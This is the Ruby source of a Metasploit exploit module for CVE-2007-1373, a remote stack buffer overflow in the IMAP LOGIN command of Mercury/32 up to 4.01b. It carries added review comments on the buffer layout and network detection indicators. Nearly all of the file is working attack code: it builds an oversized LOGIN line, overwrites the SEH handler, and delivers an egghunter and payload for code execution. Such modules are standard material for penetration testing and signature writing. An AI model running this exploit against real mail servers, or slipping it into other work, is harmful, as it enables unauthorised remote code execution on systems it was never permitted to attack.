Path: blob/master/modules/exploits/windows/imap/mercury_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2007-1373 / EDB-3418: a stack buffer overflow in the
# IMAP LOGIN handler of Mercury/32 (<= 4.01b per the description below).
# The mixins supply the TCP client (connect / sock / disconnect), the SEH
# helpers, and the egghunter generator used in #exploit.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter

  # Module metadata. Values worth knowing when triaging this module:
  # - 'BadChars': bytes the payload encoder must avoid. NUL, LF, CR and the
  #   space byte are excluded, presumably because the LOGIN line is
  #   whitespace/newline delimited (see the buffer layout in #exploit).
  # - 'Space': upper bound (2500 bytes) on the encoded payload.
  # - 'Targets': a single 'Windows Universal' entry whose 'Ret' is the value
  #   written into the SEH handler slot by #exploit.
  # - RPORT defaults to 143 (plaintext IMAP).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD
        LOGIN verb. By sending a specially crafted login command, a buffer
        is corrupted, and code execution is possible. This vulnerability was
        discovered by (mu-b at digit-labs.org).
      },
      'Author' =>
        [
          'mu-b', # Discovery and exploit
          'MC', # Metasploit module
          'Ivan Racic' # Automatic targeting + egg hunter
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2007-1373'],
          ['EDB', '3418']
        ],
      'Privileged' => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload' =>
        {
          'BadChars' => "\x00\x0a\x0d\x20",
          'Space' => 2500
        },
      'Platform' => 'win',
      'Targets' =>
        [
          ['Windows Universal',
            {
              'Ret' => 0x00401460
            }]
        ],
      'DisclosureDate' => '2007-03-06',
      'DefaultTarget' => 0))
    register_options(
      [
        Opt::RPORT(143)
      ]
    )
  end

  # Version check by banner grab only: connects, reads the server greeting
  # once, disconnects, and reports Vulnerable when the greeting matches
  # "Mercury/32 v4.01a" or "v4.01b". Nothing is sent to the service, so this
  # is a passive fingerprint of the advertised version, not a proof that the
  # overflow is reachable.
  # NOTE(review): if get_once returns nil (no greeting), `nil =~ regexp` is
  # nil and the method falls through to Safe. The two return paths spell the
  # constant differently (CheckCode:: vs Exploit::CheckCode::); presumably
  # both resolve to Msf::Exploit::CheckCode, but the style is inconsistent.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable or Safe
  def check
    connect
    resp = sock.get_once
    disconnect
    return CheckCode::Vulnerable if resp =~ %r{Mercury/32 v4\.01[ab]}
    Exploit::CheckCode::Safe
  end

  # Builds and sends the overflowing LOGIN command, then hands off to the
  # payload handler. The buffer is assembled strictly in this order, and the
  # lengths below are the ones the code uses — this is also what a network
  # detection signature for the attack would key on:
  #   'A001 LOGIN ' + 1008 space bytes + "{n}\n" with n in 0..254
  #     (a literal-style count, presumably IMAP literal syntax, LF-terminated)
  #   347 random upper-case bytes
  #   egg tag + encoded payload
  #   random upper-case padding so egg + payload + padding totals 7500 bytes
  #   "\x74\x06\x75\x04" + target.ret packed as 32-bit little-endian ('V')
  #     (the SEH record overwrite named in the module title: a 4-byte
  #     next-SEH slot followed by the handler address)
  #   20 NOPs + the egghunter stub that searches memory for the egg-tagged
  #     payload
  # A legitimate IMAP client never sends a LOGIN line of roughly 9 KB with
  # over a thousand leading spaces, so the shape alone is a usable indicator.
  # NOTE(review): `.to_i` on rand(255) is redundant (it already returns an
  # Integer), and the "Sending payload" status line is printed after
  # sock.put and the following read, so it appears once the data has already
  # been written.
  def exploit
    hunter, egg = generate_egghunter(payload.encoded)
    connect
    sock.get_once
    num = rand(255).to_i
    sploit = 'A001 LOGIN ' + "\x20" * 1008 + "{#{num}}\n"
    sploit << rand_text_alpha_upper(347)
    sploit << egg + payload.encoded
    sploit << rand_text_alpha_upper(7500 - payload.encoded.length - egg.length)
    sploit << "\x74\x06\x75\x04" + [target.ret].pack('V')
    sploit << make_nops(20)
    sploit << hunter
    sock.put(sploit)
    sock.get_once
    print_status("Sending payload (#{sploit.length} bytes) ...")
    handler
    disconnect
  end
end